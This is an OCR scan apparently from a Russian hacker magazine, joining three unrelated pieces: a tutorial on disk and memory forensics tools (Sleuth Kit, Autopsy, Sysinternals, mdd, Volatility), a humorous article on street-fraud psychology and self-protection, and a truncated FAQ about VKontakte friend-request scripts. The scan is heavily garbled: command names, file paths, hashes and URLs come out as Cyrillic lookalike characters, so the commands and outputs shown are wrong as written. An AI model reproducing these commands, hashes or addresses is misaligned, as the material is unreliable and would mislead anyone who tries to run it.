# тшіз -к сіоз /сіеѵ/зсіа 

Описание утилит можно продолжать долго, лучше один раз 
запустить и увидеть результат. Но все, о чем говорилось, поз- 
воляет лишь собрать данные, а их анализ целиком возлагает- 
ся на плечи исследователя. Для того чтобы найти в несколь- 
ких гигабайтах информации инструменты взломщика, 
потребуется немало времени и опыта. Здесь на помощь 
приходит утилита Ьбіпб из комплекта Т5К, которая умеет 
рассчитывать хеш-функции файлов и сравнивать результат 
с заранее созданной базой. База может формироваться 
как самостоятельно при помощи тсІБзііт, так и на основе 
библиотеки ЫЗВЬ (Пагіопаі Зобпѵаге Кебегепсе ІіЪгагу, ѵѵѵѵѵѵ. 
п5г1.пІ5Г.уоѵб . Проект ЫБКЪ поддерживается рядом солидных 
организаций, среди которых — Национальный Институт 



Американского Министерства юстиции (N11), Националь- 
ный Институт Стандартов и Технологии (М5Т) и так далее. 

В Ы5К1 собраны в справочный информационный набор ВХ>5 
(Кебегепсе Вага Зег, полный комплект занимает 4 СБ по 300 
Мб каждый) профили различного ПО — хеш-функции (МБ5 
и 5НА-1), данные о файле (происхождение, имя, размер и 
т.п.), что позволяет однозначно идентифицировать файл, 
даже если он был переименован. Кстати, одной из основных 
задач этой библиотеки является поиск программ при рас- 
следовании преступлений, направленных против интеллек- 
туальной собственности. Утилита Ьбіпсі проверяет значения 
хеш-функции в базе данных, используя двоичный алгоритм 
поиска, поэтому она работает быстрее, чем штатный §гер, но 
вначале следует создать индексный файл (ключ '-і') : 

# Ъ.кіпс 1 -і пзгі-зкаі /изг/ 1 оса 1 /ЬазЬ/пзг 1 / 
ЫЗКЬРіІе.кхк 

Іпсіех Сгеакесі 

В результате в текущем каталоге появится ЫЗКЬРіІе.ГхГ- 
зйаі.ісіх. Теперь можно пробить любой файл по базе: 

# тсіБзит /Ып/1з 

к58860к27 сЗ.сЗ.2 673111083670с9445099 

# Ъ.кіпс1 /изг/1оса1/ЬазЬ/пзг1/КЗКЬРі1е . кхк к58 
860627 662 673111083б70с9445099 

658860627 сЗ.сЗ.2 673111083670с9445099 НазЬ 

N 06 Роипсі 

Для примера создадим тб5-сумму важных системных 
файлов: 

# тсіБзит /Ып/* /зЫп/* /изг/Ып/* /изг/Ып/* 

> зузкеш.тсіБ 

Проверяем результат командой «сак зузііет.тбБ», генериру- 
ем индексный файл: 

# Ьбіпсі -і тсіБзит зузкет.тсіБ 

Теперь можно периодически проверять наличие изменен- 
ных файлов в контролируемых каталогах: 

# тсіБзит /Ып/* > Ьіп.тсіБ 

# Ьбіпсі -6 Ьіп.тсіБ зузкет.тсіБ 
ЗеЬ2е316ЬЬЬЬЬ94сасЬ69а7с9Ь836213а /Ьіп/ЬазЬ 
Іпѵаіісі НазЬ Ѵаіие 

Как видишь, /Ьіп/Ьа зЬ. изменился со времени создания 
базы, его контрольная сумма не совпадает. 

И, наконец, скрипт зоггег. Он умеет анализировать образ (для 
этого запускает 6І5 и ісаг) , а также находит и распознает файлы 
(при помощи бііе) . Если задействована базаЫБРІ, сортиров- 
щик может определить сразу и характер файла (опасный или 
нет) . Опасные файлы автоматически заносятся в отдельный 
файл — аІегкШ: (если использован параметр '-з', то будет сохра- 
нено и содержимое файла) . Создаем каталог, куда будет сохра- 
няться результат, и запускаем анализ раздела или сЫ-образа: 

# тксііг Ьака 

# зогкег -сі Ьака -6 пкбз /сіеѵ/зсіаі 

По окончании работы в подкаталоге сіака появится несколь- 
ко файлов с расширением ГхГ: 
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Й ІІВ ГІЙЙ^іЛІИ !^Р * 5к ЙЙ/Л ? ЧІТі 



ИНСТРУМЕНТ ВИЗУАЛИЗАЦИИ 5І.ЕІІТН КІТ — 
АІІТ0Р5У 

# 1 з бака 

агсМѵе.кхк босшпепкз . кхк бізк.кхк зогкег.зит 

Имя соответствует категориям найденных файлов: 

# сак бака/босшпепкз . кхк 

Боситепкз апсі 5еккіпдз/АІ1 бзегз /Главное меню/Програм- 

мы/Стандартные/безккор . іпі 

130-8859 кехк, мікк СКЬР Ііпе кегтіпакогз 

Ітаде : /беѵ/збаі Іпосіе : 5805-128-1 

В зогіег.зит найдем общий итог по поиску. 

ВЕБ-ИНТЕРФЕЙС АЦТОРБУ 

Утилит в составе Віеибі Кп более чем предостаточно, и это вызывает 
некоторые затруднения не только в их изучении, но и использовании 
даже у бывалых спецов. Но не беда, так как в дополнение к Т5К был 
создан инструмент визуализации — Аілорзу Рогепзіс Вгоѵѵзег Гѵуѵуѵѵ. 
зіеигіікіі.ог Ег/ашорзу) . поддерживаемый тем же автором. Аіпорзудля 
своей работы требует наличия Т5К и желательно N5111,. После запуска 
в командной строке копируем выданный ИКЬ в веб-браузер Питр:// 
ІосаНіозИ: 99991 . 

Первым делом следует создать базу данных 66-образов, предварительно 
взятых с различных дисков и систем. Для этого нужно нажать ссылку «Ыеѵѵ 
Сазе» и заполнить название и описание (можно указать несколько вари- 
антов, чтобы упростить поиск) . Далее нужно добавить сведения об узле, с 
которого снят образ. Жмем «Аб6іп§ а №ѵѵНозі» и заполняем данные — имя 
компьютера, описание, временной пояс, путь к базам Ы5КЬ. И, наконец, че- 
рез «Аб6іп§ а Иеѵѵ Іта§е» подключаем образ — задаем пулъ к файлу, тип (диск, 
раздел) . После этого можно выбрать: копирование образа, перемещение 
образа, создание симлинка. В следующем окне указываем файловую систему 
и точку монтирования. По окончании можно начинать работу. Например, 
извлечь строковые данные, отдельные блоки или удаленные файлы можно в 
«Іта§е Оеіаііз». Здесь же получаем всю необходимую информацию о данных, 
содержащихся в тех или иных блоках (А5СІІ, Нех, Зітіп§) . При необходимости 
добавляем комментарий к нужному участку. Аналогично можно вывести 
список файлов, данные о состоянии іпосіе и прочую информацию. 
Сторонними разработчиками создана альтернатива Аілорзу — РТК 
Г рік.бйаЬз.сот) , обладающая большим удобством в использовании и 
расширенными возможностями. 

В МИРЕ ОКОН 

Утилиты ѴѴіпбоѵѵз 5узіпІегпа1з (<го.тісгозоЙ.сот/?1іпкІ6= 6013253) . создан- 
ные известным программистом Марком Руссиновичем, должны быть обяза- 
тельно включены в набор инструментов исследователя. Чтобы не скачивать 



их по отдельности, лучше забрать все одним пакетом — Зузіпіетаіз ЗиЛе. 
Утилит в составе довольно много, часть из них запускается из командной 
строки, часть имеет СШ . Полное описание Зузіпіегпаіз можно найти на 
сайте по адресу, указанному выше. Остановлюсь лишь на некоторых из них. 
Так, АіЛогипз позволяет получить исчерпывающую информацию по всему, 
что загружается вместе с системой или при входе пользователя. Програм- 
мы и библиотеки отображаются именно в том порядке, в котором будут 
запускаться. Дополнительно показываются все разделы реестра, которые 
могут быть использованы для автоматического запуска, в отдельных окнах 
показываются драйвера, БЫ, кодеки и все остальное, что имеет какое-либо 
отношение к автозапуску. Результат можно сохранить в файл .агп и сравнить 
с аналогичным файлом, созданным ранее или полученным с другой подоб- 
ной системы. Утилиты Рзіпіо, РзЕо^Іізі и РгосеззЕхрІогег позволяют полу- 
чить полную информацию по системе и запущенным процессам. Список 
БЫ с номерами их версий, а также откуда они были запущены, смотрим 
при помощи ПзФИз. Утилита Напсііе показывает список открытых фай- 
лов с указанием, какие процессы их открыли. Введя в командной строке 

> АссеззСкк -а * 

узнаем об обращениях пользователя к реестру, файлам и службам ѴѴіпбоѵѵз. 
Чтобы получить полную информацию о состоянии системы, следует сохра- 
нить вывод утилит Ію§оп8е55Іоп5, РепбМоѵез, Р5Рі1е, Р5Ію§§есЮп, ТСРѴсоп, 
ТСРѴіеѵѵ, а также стандартных — ірсопй§, пеізіаі, агр, орепШез, зузіетіпіо. 
Кроме Зузіпіегпаіз, доступен ряд других полезных утилит, распространя- 
емых под Ргееѵѵаге лицензией . Например, сохранить состояние памяти в 
двоичный файл можно при помощи утилиты МВВ (МапТесЬ 66 или Метогу 
66, ѵѵѵѵѵѵ.тапііесІі.сот/тзта/МРР.азр) . которая поддерживает все попу- 
лярные на сегодня версии ОС ѴѴіпбоѵѵз: 2к,ХР,Ѵіыа, 2кЗ и 2к8. Программа 
работает как с 32, таки с 64-битными версиями ОС, она очень проста в 
использовании и позволяет сохранить до 4 Гб в указанный файл. 

> тбб.ехе -о зузтет.бтр 

512886 тар орегакіопз зиссеесіесі (0.98) 

11269 тар орегакіопз каііеб 

коок 63 зесопбз ко шгіке 

МБ5 із: 7с2112533б90сЪ5Ъб1110б0014981970 

Полученный файл формата 66 проверяется затем при помощи МР5 . Соб- 
ранные данные можно проанализировать при помощи любой утилиты, 
работающей с двоичными данными. Подобной функцией обладает и 
ЕпСазе, но он, как мы помним, не бесплатен. Запускать МРР следует с 
правами администратора. ІѴГОО — не единственная утилита с подобной 
функциональностью, немного погуглив, можно найти еще с десяток 
решений, например, ѵѵіп32бб (уѵіп32бб.тзшс1іе.пеі) . РТРіпбег (сотрілег. 
ІогепзікЫоу.бе/еп/юрісзАѵіпбомз/тетогѵ апаіѵзіз) , Ѵоіайіігу Ргатеѵѵогк 
(ѵѵѵмѵ.ѵоіагііезѵзіетз.сот) . Последняя написана на Руікоп и может быть 
запущена на все платформах, на которых поддерживается этот язык — 
Ііпих, хВ5Б, ѴѴіпбоѵѵз, Мае 05 X. После запуска Ѵоіайіііу Ргатеѵѵогк соберет 
данные о модуляхядра, запущенных процессах, открытых сетевых соеди- 
нениях и сокетах, файлах и ВЫ,, используемых процессами. 

Утилита командной строки ѴѴіпбоѵѵз Рогепзіс Тооісйез (ѵѵѵѵѵѵ.іооітооп. 
пеі/зесиглѵ/уѵй) позволяет упорядочить и автоматизировать процесс 
сбора данных, а также выдачу отчета. В своей работе ѴѴРТ исполь- 
зует другие утилиты: системные и дополнительные от Місгозой, 
Зузіпіегпаіз, Рогепзіс Ас^иізі1:іоп Шіігіез ( ѵѵѵѵѵѵ.^т^зѵзііетзіпс.сот/ 
Іаи) . біатопбез ( ѵѵѵѵѵѵ.біатопбсз.сот.аи) и так далее. Все настройки 
сохраняются в файле ѵѵй.сі^. Утилита работает в интерактивном режи- 
ме, задавая последовательно ряд вопросов, на выходе исследователь 
получает отчет в виде текстового или НТМЬ файла. В незарегистриро- 
ванной версии отключены многие удобства, например, не работает 
параметр '-ІеІсІЛооІз', который позволяет быстро сформировать рабо- 
чую среду, автоматически скачав нужные файлы. Хотя при наличии 
диска Неііх все недостающие инструменты можно взять с него (лежат в 
подкаталоге ІК) . цц 
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РЗУСНО: 

ЛУЧ СВЕТА НА ТЕМНЫЕ СТОРОНЫ ФРАУДА 

Мошенничество в реале: теория и способы защиты 

Довольно затруднительн о уд и вить честного компьютерщика са- 
мим понятием фрауда. Интернетчики целыми днями стараются на- 
парить друг друга — Ю-тесты, 8М5-перехватчики, неизвестно куда 
ведущие ссылки, кучи вирусов и вороватых троянов обеспечивают 
своим авторам более-менее стабильный доход. В реальном мире 
творится совершеннотакая же фигня. Болеетого, появиласьона 
там значительно раньше :). Действительно, люди на улицах, в бан- 
ках и офисахтоже стараются покрепче нагнуть другдруга. 



В отличие от прошлой статьи про 

манипуляции, сегодня речь пойдето 
брутальном кидалове, — тутфинансы 
ненасильственным путем пере- 
кочевывают из пункта А (который 
мы можем принять за материальную точку, 
находящуюся в области кошелька легковерного 
товарища] в пункт Б (который, соответственно, 
находится в кошельке ловкача]. Предлагаю 
твоему вниманию такой план нашего по- 
вествования — сначала мы ознакомимся со 
стадиями увлекательного процесса уличного 
развода, а затем посмотрим на те слабые места 
в человеческих душах, на которые стремятся 
воздействовать хитрые кидалы. Кстати, меня 
сильнотошнитот перестроечных слов, вроде 
«кидалы, лохи, лохотрон» (почти также, каки 
отполитоты :]], поэтому уличных обман щи ков в 
своем рассказе я представлю злыми пришель- 
цами из Космоса. В конце концов, они тоже 
стремятся вступить с нами в близкие контакты 
третьей степени. 

Начало контакта: визу- 
альная диагностика К сожале- 
нию, много(тысяче]летние попытки исследо- 
вателей сформулировать хорошо работающие 
способы выявить преступника (обманщика, 
убийцу, донжуана — нужное подчеркнуть] на 
основании его внешности кХХІ веку потерпели 
полное и окончательное поражение. В связи с 
этим у меня для тебя будут три огорчительные 

НОВОСТИ: 

1. Физиогномика — наука о связи между внеш- 
ним обликом человека и принадлежностью его 



к определенному типу личности — на самом 
деле является лженаукой, которая не работает. 

2. Теория Чезаре Ломброзо, известного 
тюремного психиатра, утверждавшего о связи 
формы черепа человека с его преступными 
наклонностями, с годами потерпела крах в 
связи с полным отсутствием научных тому 
доказательств. 

3. Паук из группы «Коррозия Металла» был 
неправ, утверждая «никогда не доверяй чело- 
веку со шрамом» в своей песне «Человек со 
шрамом». 

Можно ориентироваться на свой опыт, пытаясь 
по внешности отличить «хорошего» парня от 
«плохого», но полностью полагаться лишь на 
внешность нельзя. 

Продолжение контакта: 
инициация общения ви 

зуальный контроль пройден, и теперь ничто 
не мешает обманщику за говорить с нашим 
подопечным. Кстати, а почему? Что заставляет 
одного незнакомого человека отвечатьдругому 
незнакомому, пусть и прилично выглядяще- 
му, человеку? Винойтому опять-таки наша 
психология. Человексоциален, потребность в 
общении в ряду его потребностей стоитлишь 
немного ниже потребности в еде, воде и возду- 
хе, и именно поэтому наша культура и воспита- 
ние обуславливаютопределенное количество 
неписанных правил, одно из которых можно 
сформулироватьтак: «не реагировать на чужой 
запрос об общении — неприлично! Ответь 
хоть что-нибудь! Пусть не по делу, пусть грубо, 
пусть очень грубо, но отреагировать на сам 



запросты обязан». Если ты был в Египте или 
гулял на ВДНХ лет десять назад, то знаешь, что 
единственный выход избежать геморроя при 
встрече столпами ловкачей, предлагающих 
тебе бесплатный утюг по рекламной акции — 
идти впередс каменным лицом, ни на кого не 
глядя и ни на какие вопросы (даже матом, даже 
матом] не отвечая. С непривычки переключить 
свой внутренний файрвол в режим полной 
невидимости также трудно, каки научиться 
выдерживать чужой взгляд, но научиться этому 
стоит — атакам уличных обманщиков удобнее 
всего противодействоватьдотого, каксама 
атака начнется. Потому что иначе общение 
перейдет в следующую стадию... 

Развитие контакта: обще- 
ние в разгаре Итак, фейс-контроль 

пройден, контакт завязан, в результате чего 
ловкий гуманоид всеже поймал тебя за язык, 
и теперь старается раскрутить на расставание 
с некоторой суммой заветных космокредитов. 
Какой это будет делать? Во-первых, не даст 
тебе разорвать установленный контакт. Благо- 
даря вышеописанному механизму, прервать 
разговор без «обоюдного согласия» внутренне 
считается очень, очень неприлично. Поэтому 
человек всегда стремится этого «согласия» 
достичь — вявной, ли бовнеявной форме. 
Кстати, если один человек посылает другого на 
три буквы, и другой человек при этом обижает- 
ся, — это и есть разрыв контакта по обоюдному 
согласию. Если же ответом на «а не пошел бы 
ты» будет «вот, смотри, утюг-то какой, он же це- 
ликом из палладия, сделан древними греками, 
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Кручу-верчу — много 
выиграть хочу! Данный 
вид фрауда, вроде бы, 
сейчас сильно сдал свои 
позиции 



УГОЛОВНЫЙ 

КОДЕКС 

РОССИЙСКОЙ 

ФЕДЕРАЦИИ 



и зрения асоциаль- 
ного психопата, уголов- 
ный кодекс — это меню 
развлечений. Ценауказа- 
на в колонке справа 



потрогай!»,то это — не прерванное 
ввиду несогласия одной из сторон 
общение, поэтому прерывающая 
сторона (т.е.ты) будет чувствовать 
себя дискомфортно. Выход прост — 
осознай (заранее осознай], что 
ты человексвободный. С кем 
хочешь — разговариваешь, с кем 
не хочешь — не разговариваешь. 
Утебя нет никаких обязанностей 
по отношению куличным (не) 
знакомцам. 

Что, простые вещи? Простые — не 
простые, а большинство жертв 
инопланетных захватчиков этих 
вещей не разумеют, и потому их 
общение переходит в следующую 
фазу. Хотя, стоп, здесь есть еще 
один момент (подтверждающий 
предыдущее утверждение о том, 
что контакт проще не допустить, 
чем разорвать]. Дело втом, что по 
мере развития событий сопротив- 
ляться разрыву контакта будетуже 
не однатвоя психология, а еще и 
сам кидала со своими коллегами. 
За примерами достаточно обра- 
титься к реальной жизни. Померил 
пять пар обуви на рынке и ничего 
не купил? Продавец обижен и 
даже рассержен, он давит на тебя, 
утверждая нечто вроде «поме- 
рил — так купи!» Спросил дорогуу 
водителя маршрутки, а сам поехал 
на рядом стоящем автобусе (про- 



ездной же есть :]]? Злой шофер 
шлеттебе в спину проклятия, хотя, 
казалось бы, чем ты, свободный 
человек, ему обязан? С явными 
обманщиками ситуация анало- 
гична и может развиваться более 
брутально, с вовлечением могуче- 
го телосложения коллеги прочих 
«независимых» личностей. 

Стадия манипуля- 
ции Итак, общение в разгаре 
и идетпо разработанному злым 
пришельцем сценарию. Актеров 
в этом сценарии два — Манипу- 
ляции и Прямой Обман. Помнишь 
мою статью, посвященную мани- 
пуляциям, — «Театр корыстных 
кукловодов» из сентябрьского 
номера за этот год? Перечитай 
обязательно, поскольку манипуля- 
тивные приемы во многом общие 
для разных сфер человеческого 
общения, и диалог«обманщик- 
жертва»тому не исключение. 
Грамотно созданное ощущение де- 
фицита времени («воттотчеловек 
тоже хочет взять/купить/вы играть/ 
уже выиграл, акция продлится до 
конца сегодняшнего дня, завтра 
уезжаю в Израиль, продаю за 
бесценок — нужное подчеркнуть»], 
активное рассеивание внимания 
«пулеметной речью», уловками 
фокусника или посредством 



действий коллег (цыганские дети, 
хаотично набегающие со всех 
сторон, — один из классических 
примеров рассеивания внимания 
и отвлечения жертвы], примене- 
ние психологическихтехник(вт.ч. 
НЛП, введение в состояние легко- 
го транса с помощью причудливой 
жестикуляции], и — вуаля, особая, 
уличная магия свершилась. 
Пациентоказался один на один с 
красивой коробкой, наполненной 
кирпичом или пачкой фальшивых 
долларов, обменянных на настоя- 
щие рубли, выиграл от мертвого 
осла уши в беспроигрышную 
лотерею или заплатил за про- 
роческую беседу с цыганкой всеми 
наличными финансами. 

Материалы и ме- 
тоды По слухам, Брюс Ли го- 
ворил так: «зачем усиливать свои 
сильные стороны, если они и так 
сильные? Ослабляйте слабые, и 
тогда они исчезнут совсем». Не 
знаю, можно ли верить БрюсуЛи 
в интерпретации Олега Мальско- 
го («Три недели из жизни лепи- 
л ы»), поэтому мы пойдем другим 
путем. Рассмотрим конкретные 
виды мошенничеств, а заодно 
познакомимся с те ми уязвимо- 
стями в нашей психике, которые 
позволяют их реализовывать. 



• Магическая атака (-100 здоровья, 
-10 квосстановлению]. Долгими 
тысячелетиями наши стобой 
диковатые предки практиковали 
различные магические ништяки. 
Заговоры-заклинания, обереги и 
тотемы, вуду и наговоры, — 
полный набор. Необразованный 
народ обращался за помощью к 
неведомому по той причине, что к 
известному обращаться смысла не 
имело — кругом мрак, грязь и ни- 
чего человеческого. За считанные 
столетия все изменилось — человек 
сам научился творить чудеса. Само- 
движущиеся и летающие экипажи, 
чудесное оружие, побежденные 
болезни и прекращенные эпиде- 
мии, сильно выросшая (несмотря 
на ужасные химические лекарства 
и отвратительные антинатураль- 
ные вакцины] продолжительность 
жизни. Цивилизация, такнеодо- 
бряемая Конаном Варваром, все же 
наступила, и никакие стигийские 
колдуны ее развитию помешать 
не смогли. Благодаря вышеизло- 
женному, в сознании современ- 
ного человека возникла довольно 
причудливая картина — с одной 
стороны на негодавяттысячелетия 
серости и шаманизма, а с другой 
— совершенно родная, банальная, 
обычная цивилизация (ведь на- 
стоящей дикости современный че- 
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Реклама известной в прошлом пирамиды «МММ». Ну и на какую 
целевую аудиторию она была рассчитана? 



ловек и не видел никогда, цивилизация для него 
банальна, а современные достижения вовсе не 
кажутся чем-то чудесным]. Данный парадокс 
решается сознанием низкоинтеллектуального 
человека очень просто: современные достиже- 
ния привычны и общедоступны, а стало быть, с 
целью получения настоящих ништяков нужно об- 
ращаться не кним, а... куда?Абольше и некуда. К 



магии, астрологии, колдунам и шаманам. 

• Халява, рашен! Интересно, кто первым при- 
думал приписать стремление кхаляве (кбаіуаѵа) 
исключительно нашим стобой соотечественни- 
кам, и почему он посмел это сделать? Неиз- 
вестно, здесь мы можем только фантазировать 
— вероятно, потому, что в нашей стране вообще 
трудно прожить без того, чтобы не словчить, не 



Психология обманщика 

В психологии и психиатрии есть интересное понятие под названием «асоциальное рас- 
стройство личности». Разумеется, нельзя сказать, что им поражено 100% фраудеров :). Я 
привел его здесь потому, что для него можно представить очень интересное психологи- 
ческое описание, по крайней мере, часть которого будет справедлива для большинства 
злоумышленников. 

• Асоциальность — в данном случае это не затворничество, заставляющее человека тупо 
сидеть за компом и не выходить из дома дальше продуктового магазина, а пренебреже- 
ние социальными правилами и нормами. Законы, правила, ПДД и прочие кодексы вос- 
принимаются как некие не для них (а для дураков, хе-хе] написанные документы, которые 
совершенно необязательны для исполнения. 

• Безразличие, пофигизм, отсутствие сочувствия к окружающим. Что не исключает 
трепетно-покровительственного отношения к отдельным людям. 

• Бесчестность, безответственность (разумеется, если это выгодно]. Грубо говоря, посло- 
вица «хозяин своего слова: хочу — даю, хочу — обратно беру» про них. 

• Исходя из вышеописанного, отношение к своим жертвам (да и к окружающим в целом] 
не как к людям, а как к ботам в компьютерной игре. Иначе говоря, для законченного 
социопата жизнь будет подобна игре в РаИоиГ У большинства ловкачей все это выглядит 
несколько мягче. 

• Не воспринимает критику, убеждение, наказание. Всегда находит убедительное объ- 
яснение для своих действий, а если попадет под раздачу, будет страдать не от угрызений 
совести, а от того, что не все в своей деятельности предусмотрел и все же попался. 

• Агрессия. 

• Неспособность к унылой, законной и регулярной трудовой деятельности. Грубо говоря: 
«закрыли игровой клуб — пойду впаривать поддельные утюги в переходе, отняли утюги — 
пойду рассылать спам про левые лекарства в интернете. Работать в офис за фиксирован- 
ную зарплату и обед с 2-х до 3-х — не пойду». 

Сурово? Нет! Вполне неплохо, я бы даже сказал, прилично смотрится. Фактически, опи- 
сан вожделенный альфа-самец, который, судя по статьям в гламурных журналах, должен 
так нравиться женщинам :]. В принципе, каждый кидала вовсе не обязан обладать всеми 
указанными особенностями характера, поскольку психология — не архитектура, а люди 
— всегда друг от друга все же отличаются. Здесь я привел патологический, крайне выра- 
женный, преступный тип личности. 



найти подешевле и не дать кому-нибудь на лапу 
:]. Аесли учесть, что наценки на многиетовары 
(втом числе итвой любимый^с) составляют 
+100% (и более] от оптовой цены, становится 
вообще непонятно, какотличить болезненное 
и безоглядное стремление кхаляве, представ- 
ляющее собой широкую брешь в социальной 
безопасности гражданина, и здравомыслие 
разумного товарища, нежелающего отслюняв- 
ливать жадным коммерсантам слишком много. 
Нуда ладно, еще Публий Сир (если верить игре 
«Цивилизация») писал: «Каждый товар стоит 
ровно столько, сколько за него заплатит покупа- 
тель», поэтому обратимся к фактам. 

1. Выгодное не навязывают. Бесплатное 
не рекламируют. Хлеб за брюхом не ходит. 
Печально, но факт. Выгодная работа не рекла- 
мирует себя спамом, деньги даром не достают- 
ся, а бесплатные семинары по заработку денег 
на бирже или еще каким-либо способом вряд 
ли стоит посещать. Помни закон Ломоносова: 
«ежели в одном месте отымется, то в другом 
месте обязательно прибавится». Устроители 
семинаров вряд ли хотят, чтобы отымелось 
именно в их кармане. Стало быть, отымеется 
его посетитель. Кажется, я немного согрешил 
против великого Ломоносова — в его законе не 
было слова «отымется». В оригинале-то фигу- 
рирует «убыло и прибыло», но это меня не бес- 
покоит, поскольку «отымется» звучит смешнее. 
Да, бесплатный дтаіітоже не исключение — 
плата за бесплатную почту в виде просмотра 
контекстной рекламы «выведи паразитов из 
организма», как-то связанной с моими пись- 
мами коллегам, вполне достойна. 

2. Везение существует. Но в 99% для того, 
чтобы выиграть в лотерею, надо хотя бы 
купить лотерейный билет. «Лотереи» по адресу 
квартиры, номеру телефона, ІЛІ\Гу или адресу 
электропочты проводят только и исключитель- 
но злые инопланетные обманщики. 

3. За помощью обращаются к знакомым, про- 
веренным, людям. К незнакомым за помощью 
обращаются только кто? Правильно, товарищи из 
третьего ряда! Только они. Казалось бы, простые 
вещи, а между тем, суммы денег, извлеченные из 
карманов одних только американцев (не только 
мы с тобой любим халяву] по «нигерийским 
письмам», исчисляются миллионами долларов. 
Если интересно, загугли на предмет «нигерий- 
ских писем» и «Анна Мария Поэт». В конце 
концов, проиметь 2,1 млн. баксов компании в 
надежде заполучить деньги репрессированного 
повелителя негритянской страны (или что-то в 
этом роде) без определенного таланта трудно. 

• «Право имеющие». Исторически так сложи- 
лось, что один человек определяет в другом 
человеке «имеющего право на» (распоря- 
жаться, руководить, прессовать, указывать 
другим на то, что им надо делать] не путем 
изучения предъявляемых данным господином 
удостоверений и мандатов, а просто в процес- 
се общения. Аточнее, в самом-самом начале 
его: с подсознательного анализа позы, взгля- 
да, голоса. Именно этой особенностью нашего 
стобой устройства и пользуются прикиды- 
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Нигерийским письмам посвящена отдельная статья 
Википедии 




Остап Бендер — один 
из самых известных 
кинообманщиков 



вающиеся Большими Людьми 
и представителями силовых 
ведомств мошенники. Бесспорно, 
с непривычки трудно оборвать 
и потребовать документы с 
некоего имперсонатора, уверенно 
представляющегося капралом 
Галактической Полиции и тре- 
бующего быстро-быстро (манипу- 
ляция временем!) внести взятку 
за задержанного в Космопритоне 
брата, но... будь готов. Ключи те 
же: спокойствие, самооценка, 
способность взять легальную 
паузу. В эту же категорию можно 
отнести хитрецов, прикидываю- 



щихся состоятельными господами 
и под это дело проворачивающих 
свои делишки в виде получения 
кредитов, авансов, льгот и левых 
заказов. Решение аналогично — 
не бойся оскорбить людей «недо- 
верием». Только бизнес, ничего 

ЛИЧНОГО :). 

• «Твари дрожащие». Обратная 
ситуация — гуманоиды, искусно 
прикидывающиеся ранее обману- 
тыми, напаренными и бесчестно 
кинутыми гражданами, усыпляют 
внимание своих жертв. Чего пло- 
хого может ждать лидер (на самом- 
то деле, жертва) от столь жалкой 
личности, хронического лузера и 
буквоеда? Казалось бы, ничего, но 
твое внимание рассеяно, и вот уже 



жалкий буквоед, придирчиво изу- 
чающий условия договора (как бы 
не обманули!), добавляет туда наги- 
бающий лично тебя подзаголовок. 

• Любовное попадалово. Можно 
ли считать нашу стобой убежден- 
ность в тотальной собственной 
привлекательности для противо- 
положного пола уязвимостью? 

Нет! Это круто! Это круто, Бивис. 

Я так считаю. Тем не менее, 
осмотрительным быть опять-таки 
стоит — на этом светлом чувстве 
паразитируют слишком многие, 
и потери могутбыть довольно 
значительными — от получения 



по головетяжелым предметом в 
исходе случайного знакомства до 



банального воровства в исходе 
«пойдем же скорее ко мне» и про- 
чего брачного аферизма. Короче, 
разбирайся сам, не маленький. 

• Великие пирамиды. Эпическое 
шарлатанство, изобретенное давно, 
но все никак не сдающее своих по- 
зиций. Основанооно на одном 
интересном факте из нашей стобой 
психологии. Какэто ни прискорб- 
но, каждый человексчитаетсебя 
умнее большинства других людей. А 
сугьдела в том, что по-настоящему 
умные люди поняли, что самолично 
искатьлюдей, готовых принести им 
свои деньги или услуги, довольно 



напряжно, аточнее — невыгодно. Так 
почему бы не запустить механизм: ты 
несешьденьги мне, тебе несут деньги 
твои люди, твоим людям нес^ деньги 
их люди. Стандартная пищевая 
пирамида, только внизу пищевой 
пирамиды землян находится трава, 
которая питается халявной энергией 
солнца, а в конце мошеннических пи- 
рамид находится большое-большое 
количество обманных человечков. 
Которые, правда, надеялись быть 
хотя бы в середине. Кстати, я очень 
советую тебе посмотреть на рекламу 
могучего АО «МММ»сейчас, когда 
она приобрела чисто историческое 
значение. Как можно было повестись 
натакиеужасныеролики?Авоттак. 
Реклама соответствовала времени и 
настроению граждан. Таков он был, 
средний гражданин. Леня Голубков. 
Купил жене сапоги :). 

В интернетахтакже процве- 
тает и нва йтно-реферально- 
пирамидальная система, которая 
далеко не всегда преследует 
чисто мошеннические цели. И 
все же, скиньте мне инвайтик на 
какой-нибудь сайт, где мне чисто 
за свое присутствие и нескольких 
рефералов (которые тоже рас- 
кидают инвайтики) скинут почтой 
новый ноутбук. Авось и повезет, я 
же ничего нетеряю :). 

Заключение нет 

никаких сомнений в том, что 
конкретных способов оказаться 
напаренным бесконечно много. 
Человеческий ум велики могуч, 
каждый день он придумывает все 
новые и новые методы заработка 
денег нечестным путем. Способов- 
то много, но все они воздействуют 
на старые как мир уязвимости в 
нашем стобой сознании. Так что, 
дерзай, усиливай свои сильные 
стороны и не забывай про слабые. 
Удачи! □с 



ПО СЛУХАМ, БРЮС Л И ГОВОРИЛ ТАК: 
«ЗАЧЕМ УСИЛИВАТЬ СВОИ СИЛЬНЫЕ 
СТОРОНЫ, ЕСЛИ ОНИ И ТАК СИЛЬНЫЕ? 
ОСЛАБЛЯЙТЕ СЛАБЫЕ, И ТОГДА ОНИ 
ИСЧЕЗНУТ СОВСЕМ» 



Горячая пятерка правил о том, как уберечься 
от фрауда в реале 

Ищи ништяки самостоятельно. Под лежачий камень вода не течет. 

• Запрети своей подружке контактировать с цыганами, гадалками и прочим оккультизмом. 

• Не контактируй с буйными коммивояжерами. Слушать их бредятину опасно, шанс попасться на 
уловки есть (все-таки профессиональные манипуляторы). Лучше приди домой, поищи аналогич- 
ный товар в интернете. 

• Чтобы выиграть в лотерею, нужно сначала купить лотерейный билет. Бесплатно деньги, к сожа- 
лению, не раздают. 

• Избегай мошенничества при обмене бабла. В официальных обменниках курс может быть пони- 
же, но зато и надеж... елки-палки, я гоню. И курс там бывает хреновый и напарить опять-таки 
могут :). Короче, смотри в оба. Контролируй и правильность курса, деньги сразу пересчитывай и 
подлинность их контролируй. Еще железный лоток рукой внутри ощупывай — хитрые кассирши до 
сих пор последнюю купюру из пачки отделяют и зажимают ближе к своему краю. Типа, перед сте- 
клом пересчитали? Правильно? Бери пачку и свободен! 
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ІЛЧІТ5 



1 




0: Какодобрить/отклонитьза один раз все заяв- 
ки на вступление в друзья «ВКонтакте»? 

А: Специально для тебя команда ЬаскесІ.зи заре- 
лизила множество рбр-скриптов для подобных 
целей. Найти их можно по адресу ЬНрУ/ЬаскесІ. 
зи/БсгірІз.рбр . а вот и сам список скриптов: 

1. Друзья: 

• Одобряем все заявки на вступление в друзья; 

• Отменяем все заявки на вступление в друзья; 

• Сохранение списка друзей на сервере, даже 
если он закрыт; 

